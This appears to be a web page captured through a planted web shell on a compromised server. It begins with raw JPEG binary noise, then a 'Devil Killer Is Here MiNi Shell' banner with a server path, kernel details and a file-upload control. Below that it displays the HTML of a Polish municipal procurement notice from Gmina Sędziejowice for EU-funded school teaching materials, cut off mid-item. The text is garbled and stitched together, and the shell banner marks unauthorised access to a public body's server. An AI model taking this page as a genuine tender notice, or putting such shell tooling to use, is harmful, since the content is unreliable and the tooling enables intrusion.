JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250304/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250304/0012987601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawy związane z wdrożeniem projektu” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA SĘDZIEJOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934594</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wieluńska 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sędziejowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-160</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">43/6771693</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@gminasedziejowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://gminasedziejowice.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawy związane z wdrożeniem projektu” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-92c92ce0-2549-4b43-a4f8-bfd9223cb1ea</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00129876</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00048041/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawy związane z wdrożeniem projektu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie realizowane w ramach projektu pn.: „Krok do przyszłości w Gminie Sędziejowice: podniesienie jakości edukacji w szkole podstawowej’’ z udziałem środków Europejskiego Funduszu Społecznego Plus w ramach Programu Regionalnego Fundusze Europejskie dla Łódzkiego 2021 – 2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gmina_sedziejowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż oferta), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem https://platformazakupowa.pl/pn/gmina_sedziejowice i formularza Wyślij wiadomość dostępnego na stronie dotyczącej danego postępowania. W sytuacjach awaryjnych np. w przypadku niedziałania<br/>platformazakupowa.pl Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej: zamowienia@gminasedziejowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Wymagania techniczne i organizacyjne wysyłania i odbierania dok. elektronicznych, elektronicznych kopii dok. i oświadczeń oraz inf. przekazywanych przy ich użyciu opisane zostały w Regulaminie Internetowej Platformy platformazakupowa.pl Open Nexus Sp.z o.o. korzystania z<br/>https://platformazakupowa.pl/ i są dostępne przy każdym postępowaniu na platformie, regulamin platformy znajduje się w stopce strony lub pod adresem: https://platformazakupowa.pl/strona/1- regulamin 2)Za datę przekazania oferty, zawiadomień, dok. elektronicznych, oświadczeń lub elektronicznych kopii dok. lub oświadczeń oraz innych inf. przyjmuje się datę ich przekazania na<br/>https://platformazakupowa.pl/ i otrzymania komunikatu potwierdzającego. 3)Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dn. 9 listopada 2017r. ws. ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów<br/>publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. 4)Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg)ze szczególnym wskazaniem na .pdf 5)W celu ewen. kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: a).zip b).7Z 6)Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują:.rar .gif .bmp. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. 7)Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maks. 10 MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu<br/>osobistego,który wynosi max 5MB. 8)Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:a)dla dokumentów w formacie „pdf” zaleca się podpis w formatem PadES,b)dokumenty w formacie innym niż „pdf” zaleca się podpisywać formatem XadES,c)do składania podpisu zaleca się stosowanie algorytmu SHA-2 (lub wyższy).9)Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. 10)Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.11)Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich. Może to skutkować brakiem integralności plików. 12)Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. 13)Komunikacja za pośrednictwem platformy zakupowej wymaga założenia konta Użytkownika. 14)W celu założenia konta Użytkownika na platformie zakupowej, koniecznym jest posiadanie przez Wykonawcę aktywnego e-maila.Korzystanie z platformy zakupowej przez Wykonawcę jest bezpłatne.15)Wymagania dot. specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl,tj.: a)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b)komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7,<br/>Mac Os x 10 4, Linux, lub ich nowsze wersje,c)zainstalowana dowolna przeglądarka internetowa, Uwaga:od dn. 17.08.2021, ze względu na zakończenie wspierania przeglądarki Internet Explorer przez firmę Microsoft, stosowanie przeglądarki Internet Explorer nie będzie dopuszczalne d)włączona<br/>obsługa JavaScript, e)zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,f)Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,g)Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss)gen. wg.czasu lokalnego serwera synchronizowanego z zegarem Gł.Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/><br/>1)	administratorem Pani/Pana danych osobowych jest<br/>Gmina Sędziejowice<br/>ul. Wieluńska 6<br/>98 – 160 Sędziejowice<br/>tel. 43 / 677 10 02<br/>fax. 43 / 677 10 06<br/>2)	z inspektorem ochrony danych osobowych w Gminie Sędziejowice można kontaktować się za pomocą adresu iod@gminasedziejowice.pl;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Dostawy związane z wdrożeniem projektu” realizowanym w ramach projektu pn.: „Krok do przyszłości w Gminie Sędziejowice: podniesienie jakości edukacji w szkole podstawowej” z udziałem środków Europejskiego Funduszu Społecznego Plus w ramach Programu Regionalnego Fundusze Europejskie dla Łódzkiego 2021 – 2027, znak postępowania RW.VI.271.2.2025 prowadzonym w trybie podstawowym, o którym mowa w art. 275 pkt 1 ustawy PZP;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320), dalej „ustawa Pzp”;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>a.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>d.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>a.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RW.VI.271.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: <br/>1.	Dostawa 215 zestawów pomocy dydaktycznych dla uczniów do realizacji warsztatów rozwijających kompetencje społeczno-emocjonalne. <br/>2.	Przeprowadzenie szkolenia dla 20 nauczycieli rozwijającego kompetencje społeczno - emocjonalne. <br/>3.	Dostawa 225 zestawów pomocy dydaktycznych dla uczniów do realizacji zajęć z zakresu orientacji zawodowej. <br/>4.	Dostawa 2 tablic wielkoformatowych do zajęć z zakresu orientacji zawodowej. <br/>Ad 1. Dostawa 215 zestawów dydaktycznych rozwijających kompetencje społeczno - emocjonalne składających się z poniższych elementów: <br/>a)	Księga do wklejania kart pracy. Specyfikacja format A4, okładka twarda kolor minimum 350 gram, foliowana, książka klejona: liczba stron min. 64, logotypy zadrukowane; <br/>b)	Karty pracy 64 szt. INTERAKTYWNE (mówiące) do wprowadzania ćwiczeń społeczno - emocjonalnych. Specyfikacja: format A4, druk kolor, min. 64 kartki, kody optyczne (mówiące, interaktywne) wtłoczone drukarsko nie naklejane. <br/>c)	Książki ćwiczeń 4 sztuki: rozwijające umiejętności komunikacyjne, rozpoznawanie i kierowanie swoimi emocjami; budowanie dobrych relacji z innymi; ograniczanie destrukcyjnych, czy agresywnych zachowań druk kolor, format A5, okładka min. 250 gr, minimum 16 stron. <br/>d)	Książka ćwiczeń rozwijająca zainteresowania, mocne strony u dzieci, osiąganie celów, rozwiązywanie problemów i konfliktów. Druk kolor, format A4, okładka minimum 350 gram, foliowana; minimum 12 stron, logotypy zadrukowane na okładce. <br/>e)	Teczka na materiały, druk kolor z zadrukowanymi logotypami województwa łódzkiego (EFS +) <br/>Ad 2. Przeprowadzenie szkolenia dla 20 nauczycieli w siedzibie Realizatora projektu ZSO w Sędziejowicach. Informacje na temat szkolenia: 1 grupa szkoleniowa, czas trwania szkolenia 8h. Tematyka szkolenia: rozwój kompetencji społeczno-emocjonalnych, dostarczenie scenariuszy do prowadzenia zajęć dla dzieci, rozpoznawanie emocji i zarządzanie nimi, ćwiczenia podnoszące poziom samooceny, omówienie pracy na autorskich materiałach dydaktycznych. <br/>Ad 3. Dostawa 225 zestawów pomocy dydaktycznych do realizacji zajęć z orientacji zawodowej składających się z poniższych elementów: <br/>a)	Karty pracy: 20 sztuk format A4, druk kolor. <br/>b)	Książki ćwiczeń 2 sztuki, druk kolor, liczba stron minimum 20, format A4. Książki ćwiczeń bedą zawierały naklejki z wykrojnikiem. Tematyka w książkach ćwiczeń: zapoznanie uczniów z różnorodnością zawodów na rynku pracy, przeciwdziałanie stereotypom związanym z płcią, wspieranie nauk ścisłych (STEM), rozwijanie proaktywnej postawy wobec pracy, stwarzanie sytuacji edukacyjnych sprzyjających poznawaniu i rozwijaniu zainteresowań i pasji. <br/>Ad 4. Tablice do rozwoju wiedzy na temat orientacji zawodowej sztuk 2, format 90 na 120 cm, magnetyczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">39162000-5 - Pomoce naukowe</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty w ramach części 1, Zamawiający będzie stosować następujące kryteria oceny ofert:<br/>a. Cena – 60%,<br/>b. Termin realizacji dostawy – 40%.<br/>2. Punkty przyznane w ramach kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C=C_min/C_b ×60pkt<br/>gdzie:<br/>	C – liczba punktów, którą uzyskała badana oferta w kryterium „Cena”,<br/>	Cmin – cena (cena ofertowa brutto w ramach poszczególnych zadań) najtańszej oferty spośród ofert nieodrzuconych,<br/>	Cb – cena (cena ofertowa brutto) badanej oferty spośród ofert nieodrzuconych.<br/>Maksymalnie można uzyskać 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>3. Punkty przyznane w ramach kryterium „Termin realizacji dostawy” (D) zostaną przyznane według wzoru:<br/>D=D_min/D_z ×40pkt<br/>gdzie:<br/>	D – liczba punktów, którą uzyskała badana oferta w kryterium „Termin realizacji dostawy”,<br/>	Dz – termin realizacji dostawy zadeklarowany w ocenianej ofercie,<br/>	Dmin – najkrótszy termin realizacji dostawy spośród nieodrzuconych ofert.<br/>W tym kryterium można uzyskać maksymalnie 40 punktów Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>UWAGA:<br/>	Najkrótszy możliwy termin realizacji dostawy wymagany przez Zamawiającego: 7 dni od daty podpisania umowy.<br/>	Najdłuższy możliwy termin realizacji dostawy: 21 dni od daty podpisania umowy.<br/>	Wykonawca może zaproponować termin realizacji dostawy w przedziale od 7 do 21 dni od daty podpisania umowy. Zaoferowany przez Wykonawcę termin realizacji dostawy zostanie uwzględniony w umowie.<br/>	Wykonawca, który zaoferuje najkorzystniejszy termin realizacji dostawy (7 dni od daty podpisania umowy) otrzyma maksymalną ilość punktów – 40 punktów.<br/>	Wykonawca, który zaoferuje termin realizacji dostawy w ciągu 21 dni od daty podpisania umowy - otrzymuje 0 pkt.<br/>	Pozostali Wykonawcy (tj. Wykonawcy, którzy zaproponowali wartość pośrednią, pomiędzy wartością najkorzystniejszą a najmniej korzystną), otrzymują liczbę punktów (D) obliczoną wg powyższego wzoru.<br/>4. W zakresie części 1 za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie z poniższym wzorem:<br/>P=C+D<br/>	gdzie:<br/>	P – łączna liczba punktów ocenianej oferty,<br/>	C – liczba punktów uzyskanych w ramach kryterium „Cena”,<br/>	D – liczba punktów uzyskanych w ramach kryterium „Termin realizacji dostawy”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Dostawa 270 zestawów pomocy dydaktycznych dla uczniów do realizacji zajęć rozwijających kompetencje kluczowe. <br/>2.	Dostawa tablic wielkoformatowych do rozwoju kompetencji kluczowych. <br/>3.	Przeprowadzenie szkolenia dla 20 nauczycieli z zakresu rozwoju kompetencji kluczowych. <br/><br/>Ad 1. Dostawa 270 zestawów dydaktycznych rozwijających kompetencje kluczowe składających się z poniższych elementów: <br/>a)	Księga do wklejania kart pracy. Format A4, okładka twarda, klejona, papier minimum 350 gram, foliowany, format A4, środek minimum 64 strony. <br/>b)	Karty pracy interaktywne, mówiące, format A4, druk kolor, minimum 64 kartki, kody optyczne (mówiące, interaktywne) wtłoczone drukarsko nie naklejane. <br/>c)	Książka ćwiczeń: notowanie nielinearne, format A4, książka mówiąca, kody optyczne wtłaczane nie klejone okładka 350 gram druk kolor, foliowana minimum 16 stron, naklejki samoprzylepne na wykrojniku A3. <br/>d)	Książka ćwiczeń: zapamiętywanie, okładka 250 gram, druk kolor, 